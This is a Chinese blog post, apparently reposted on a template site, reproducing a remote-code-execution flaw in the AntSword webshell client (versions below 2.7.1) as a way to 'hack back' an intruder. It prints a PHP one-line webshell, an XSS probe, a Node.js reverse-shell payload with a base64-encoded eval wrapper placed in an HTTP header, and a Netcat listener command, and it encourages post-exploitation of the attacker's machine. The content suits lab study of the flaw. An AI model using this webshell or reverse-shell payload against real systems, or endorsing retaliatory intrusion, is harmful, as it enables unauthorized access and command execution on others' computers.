中国蚁剑AntSword反制 RCE漏洞复现 windows环境上反弹shell 吊打攻击你的黑客

这篇具有很好参考价值的文章主要介绍了中国蚁剑AntSword反制 RCE漏洞复现 windows环境上反弹shell 吊打攻击你的黑客。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

中国蚁剑(AntSword) 是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。

WebShell

WebShell可以理解为网页中的木马程序,通过植入到你的web站点,在web页面上的操作,控制你的计算机操作系统,文件,权限,任意命令执行。

常见的WebShell分为大马小马一句话木马内存马等。

下面为一句话木马的代码展示:

# 一句话木马
<?php @eval($_POST['pass']); ?>

中国蚁剑(AntSword)

当你的计算机被植入了一句话木马后,需要通过工具进行连接,才可以方便管理,而AntSword就是连接一句话木马工具中的其中之一,类似的工具还有:中国菜刀哥斯拉冰蝎等。

中国蚁剑(AntSword) RCE漏洞

此漏洞在AntSword2.7.1版本上修复 ,所以适用于AntSword2.7.1以下版本。

此漏洞为AntSword连接WebShell失败时对html代码的解析,导致xss漏洞,而使html代码不在浏览器解析而是在服务器上解析的话需要用到nodejs,所以AntSword使用了nodejs,本文章就讲解利用xss漏洞执行并调用nodejs的库反弹shell拿到权限

吊打黑客的场景

黑客在你的web服务上植入了WebShell,利用蚁剑去连接并控制了你的电脑,这时被你发现了电脑被控制 变的卡卡的,并且发现了是通过web服务里的WebShell来控制你的,想到自己磁盘里几十G的秘密学习资料可能全部被窃取,你很不爽,你想找到这个黑客小子,绞尽脑汁想了很多办法也无法痛快的还击,直到你想起来以前读到过的我这篇文章,你抱着试试看的态度去尝试了一下,发现成功反向黑掉了那个黑客的电脑,于是你对这个黑客一系列的还击计划开始在脑海里活蹦乱跳...

模拟环境准备:

黑客ip: 192.168.31.124 系统: win7
被攻击的ip:192.168.31.222 系统:win10

黑客电脑软件:

中国蚁剑AntSword2.7.0

中国蚁剑加载器AntSword-Loader2.0.1

被攻击电脑软件

小皮面板Phpstudy

瑞士军刀Netcat

被攻击电脑web部署

  1. 安装好phpstudy并运行apache

antsword,网络安全,RCE,WEBSHELL,网络安全,node.js,javascript,Powered by 金山文档
  1. 打开80端口的网站目录 并放入一句话木马WebShell文件

antsword,网络安全,RCE,WEBSHELL,网络安全,node.js,javascript,Powered by 金山文档
antsword,网络安全,RCE,WEBSHELL,网络安全,node.js,javascript,Powered by 金山文档

黑客电脑连接WebShell

antsword,网络安全,RCE,WEBSHELL,网络安全,node.js,javascript,Powered by 金山文档

此时我们作为被攻击的电脑,可以尝试修改WebShell的代码

  1. 将一句话木马代码改为如下:

<?php header("HTTP/1.1 500 <img src=1 onerror=alert(1) />") ?>
antsword,网络安全,RCE,WEBSHELL,网络安全,node.js,javascript,Powered by 金山文档
  1. 黑客电脑重新连接一句话木马查看效果

antsword,网络安全,RCE,WEBSHELL,网络安全,node.js,javascript,Powered by 金山文档

发现执行了我们修改的代码中的alert(1) 弹出了提示框,证明是存在xss漏洞的

利用nodejs库编写payload,反弹黑客电脑的shell

使用<=AntSword2.7.0 RCE漏洞,让黑客电脑反弹shell到被攻击电脑的1971端口上
  1. 首先开启被攻击电脑的Netcat 监听端口1971

nc -Lp 1971
antsword,网络安全,RCE,WEBSHELL,网络安全,node.js,javascript,Powered by 金山文档
  1. 更改shell.php代码

利用nodejs库反弹shell的代码(payload):

var net = require("net");
var cmd = require("child_process").exec("cmd.exe");
var socket = new net.Socket();
socket.connect(1971, "192.168.31.222", function(){
    socket.pipe(cmd.stdin);
    cmd.stdout.pipe(socket);
    cmd.stderr.pipe(socket);
});

以上代码通过创建Socket来连接192.168.31.222(被攻击的电脑ip) 的1971端口(Netcat监听的端口)

将以上代码进行base64加密,加密后的密文:

dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpOwp2YXIgY21kID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNtZC5leGUiKTsKdmFyIHNvY2tldCA9IG5ldyBuZXQuU29ja2V0KCk7CnNvY2tldC5jb25uZWN0KDE5NzEsICIxOTIuMTY4LjMxLjIyMiIsIGZ1bmN0aW9uKCl7CiAgICBzb2NrZXQucGlwZShjbWQuc3RkaW4pOwogICAgY21kLnN0ZG91dC5waXBlKHNvY2tldCk7CiAgICBjbWQuc3RkZXJyLnBpcGUoc29ja2V0KTsKfSk7

通过javascript的eval函数来调用:

eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpOwp2YXIgY21kID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNtZC5leGUiKTsKdmFyIHNvY2tldCA9IG5ldyBuZXQuU29ja2V0KCk7CnNvY2tldC5jb25uZWN0KDE5NzEsICIxOTIuMTY4LjMxLjIyMiIsIGZ1bmN0aW9uKCl7CiAgICBzb2NrZXQucGlwZShjbWQuc3RkaW4pOwogICAgY21kLnN0ZG91dC5waXBlKHNvY2tldCk7CiAgICBjbWQuc3RkZXJyLnBpcGUoc29ja2V0KTsKfSk7`,`base64`).toString())

并替换掉我们前边写的alert(1)代码,最终写到shell.php中的代码如下:

<?php header("HTTP/1.1 500 <img src=1 onerror='eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpOwp2YXIgY21kID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNtZC5leGUiKTsKdmFyIHNvY2tldCA9IG5ldyBuZXQuU29ja2V0KCk7CnNvY2tldC5jb25uZWN0KDE5NzEsICIxOTIuMTY4LjMxLjIyMiIsIGZ1bmN0aW9uKCl7CiAgICBzb2NrZXQucGlwZShjbWQuc3RkaW4pOwogICAgY21kLnN0ZG91dC5waXBlKHNvY2tldCk7CiAgICBjbWQuc3RkZXJyLnBpcGUoc29ja2V0KTsKfSk7`,`base64`).toString())' />") ?>
antsword,网络安全,RCE,WEBSHELL,网络安全,node.js,javascript,Powered by 金山文档
  1. 黑客电脑尝试重新连接一句话木马,查看效果

黑客使用蚁剑重连,在报错的同时,反弹给了我们一个shell到Netcat监听的1971端口上

antsword,网络安全,RCE,WEBSHELL,网络安全,node.js,javascript,Powered by 金山文档

利用shell执行命令,查看信息,成功拿下黑客电脑的管理员账号,ip也对应黑客电脑的192.168.31.124

antsword,网络安全,RCE,WEBSHELL,网络安全,node.js,javascript,Powered by 金山文档

至此,你终于可以对黑客发起反击,进行后渗透...文章来源地址https://www.toymoban.com/news/detail-647256.html

在该漏洞问题被提出之后,中国蚁剑的作者在及时发布了中国蚁剑的新版本 AntSword v2.7.1+。

到了这里,关于中国蚁剑AntSword反制 RCE漏洞复现 windows环境上反弹shell 吊打攻击你的黑客的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • webshell管理工具-antSword(蚁剑)的安装和管理

    中国蚁剑是一款流行的网络安全工具,它由中国安全研究人员研发,主要用于测试和评估网络的安全性。 蚁剑具有强大的功能,可以用于远程控制和管理服务器,包括文件管理、进程管理、端口扫描、SQL注入、WebShell等功能。它还可以在未授权的情况下访问和操纵目标系统,

    2024年02月16日
    浏览(41)
  • Apache ActiveMQ RCE漏洞复现

    1、 产品简介 ActiveMQ是一种开源的基于JMS(Java Message Servie)规范的一种消息中间件的实现,ActiveMQ的设计目标是提供标准的,面向消息的,能够跨越多语言和多系统的应用集成消息通信中间件。ActiveMQ是Apache出品,最流行的,能力强劲的开源消息总线。 2、 漏洞概述 Apache Act

    2024年01月22日
    浏览(35)
  • ThinkPHP 多语言模块RCE漏洞复现

    ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且

    2023年04月22日
    浏览(45)
  • ThinkPHP 3.2.x RCE漏洞复现

    ThinkPHP3.2远程代码执行漏洞,该漏洞产生原因是由于在业务代码中如果对模板赋值方法assign的第一个参数可控,则导致模板路径变量被覆盖为携带攻击代码路径,造成文件包含,代码执行等危害。 复现环境:phpstudy+php7.3.4+ThinkPHP3.2.3完整版+windows10 一、 搭建环境: 在ThinkPHP的

    2023年04月08日
    浏览(34)
  • 漏洞复现-docker-unauthorized-rce

    目录 一、漏洞介绍 1.1漏洞成因 2.2环境准备 二、漏洞检测 三、漏洞利用 1.脚本利用 2.定时任务反弹shell 3. 写ssh公钥获取shell 1.1漏洞成因         docker remote API未授权访问漏洞,此API主要目的是取代命令执行页面,开放2375监听容器时,会调用这个API。方便docker集群管理和扩展

    2024年02月09日
    浏览(36)
  • Hessian 反序列化RCE漏洞复现

         Hessian是二进制的web service协议,官方对Java、Flash/Flex、Python、C++、.NET C#等多种语言都进行了实现。Hessian和Axis、XFire都能实现web service方式的远程方法调用,区别是Hessian是二进制协议,Axis、XFire则是SOAP协议,所以从性能上说Hessian远优于后两者,并且Hessian的JAVA使用方法非

    2024年02月11日
    浏览(34)
  • 锐捷EWEB网管系统 RCE漏洞复现

      锐捷网管系统是由北京锐捷数据时代科技有限公司开发的新一代基于云的网络管理软件,以“数据时代创新网管与信息安全”为口号,定位于终端安全、IT运营及企业服务化管理统一解决方案。   Ruijie-EWEB 网管系统 flwo.control.php 中的 type 参数存在命令执行漏洞,攻击者可利

    2024年02月03日
    浏览(35)
  • CVE -2022-26134漏洞复现(Confluence OGNL 注入rce漏洞)

    0x01 Atlassian Confluence Atlassian Confluence是一个专业的企业知识管理与协同软件,主要用于公司内员工创建知识库并建立知识管理流程,也可以用于构建企业wiki。其使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。因此

    2024年02月16日
    浏览(40)
  • 【漏洞复现】Fastjson_1.2.47_rce

    感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规 说明 内容 漏洞编号 漏洞名称 Fastjson_1.2.47_远程执行漏洞 漏洞评级 影响范围 漏洞描述 修复方案 1.1、漏洞描述 Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目

    2024年02月05日
    浏览(32)
  • CVE漏洞复现-CVE-2022-22965-Spring-RCE漏洞

    Spring framework 是Spring 里面的一个基础开源框架,其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行

    2023年04月21日
    浏览(52)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包